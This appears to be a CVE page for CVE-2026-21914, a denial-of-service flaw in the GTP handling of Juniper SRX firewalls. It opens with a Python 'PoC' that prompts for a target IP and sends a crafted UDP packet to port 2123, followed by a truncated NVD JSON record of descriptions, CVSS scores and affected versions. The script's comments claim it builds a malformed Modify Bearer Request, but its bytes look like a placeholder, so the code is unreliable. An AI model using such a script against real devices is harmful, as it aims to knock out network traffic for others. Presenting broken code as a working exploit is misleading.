CVE-2026-21914

#!/usr/bin/env python3 import socket # 构造特制的GTP Modify Bearer Request消息 def create_malformed_gtp_packet(): # GTP消息头 gtp_header = bytes([0x32, 0x01, 0x00, 0x00]) # GTP协议头 # 添加触发漏洞的负载 payload = b'\x00' * 100 # 填充数据 return gtp_header + payload def exploit_cve_2026_21914(target_ip, target_port=2123): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = create_malformed_gtp_packet() sock.sendto(packet, (target_ip, target_port)) sock.close() if __name__ == "__main__": print("CVE-2026-21914 PoC") target = input("目标IP: ") exploit_cve_2026_21914(target)

{"cve": {"id": "CVE-2026-21914", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:07.700", "lastModified": "2026-01-23T19:41:03.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Locking vulnerability in the GTP plugin of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (Dos).\n\nIf an SRX Series device receives a specifically malformed GPRS Tunnelling Protocol (GTP) Modify Bearer Request message, a lock is acquired and never released. This results in other threads not being able to acquire a lock themselves, causing a watchdog timeout leading to FPC crash and restart. This issue leads to a complete traffic outage until the device has automatically recovered.\n\nThis issue affects Junos OS on SRX Series:\n\n * all versions before 22.4R3-S8,\n * 23.2 versions before 23.2R2-S5,\n * 23.4 versions before 23.4R2-S6,\n * 24.2 versions before 24.2R2-S3,\n * 24.4 versions before 24.4R2-S2,\n * 25.2 versions before 25.2R1-S1, 25.2R2."}, {"lang": "es", "value": "Una vulnerabilidad de bloqueo incorrecto en el plugin GTP de Juniper Networks Junos OS en la serie SRX permite a un atacante no autenticado y basado en red causar una denegación de servicio (DoS).\n\nSi un dispositivo de la serie SRX recibe un mensaje de solicitud de modificación de portador (Modify Bearer Request) del protocolo de tunelización GPRS (GTP) específicamente malformado, se adquiere un bloqueo y nunca se libera. Esto resulta en que otros hilos no pueden adquirir un bloqueo por sí mismos, causando un tiempo de espera del watchdog que lleva a un fallo y reinicio del FPC. Este problema lleva a una interrupción completa del tráfico hasta que el dispositivo se haya recuperado automáticamente.\n\nEste problema afecta a Junos OS en la serie SRX:\n\n * todas las versiones anteriores a 22.4R3-S8,\n * versiones 23.2 anteriores a 23.2R2-S5,\n * versiones 23.4 anteriores a 23.4R2-S6,\n * versiones 24.2 anteriores a 24.2R2-S3,\n * versiones 24.4 anteriores a 24.4R2-S2,\n * versiones 25.2 anteriores a 25.2R1-S1, 25.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-667"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vu ... (truncated)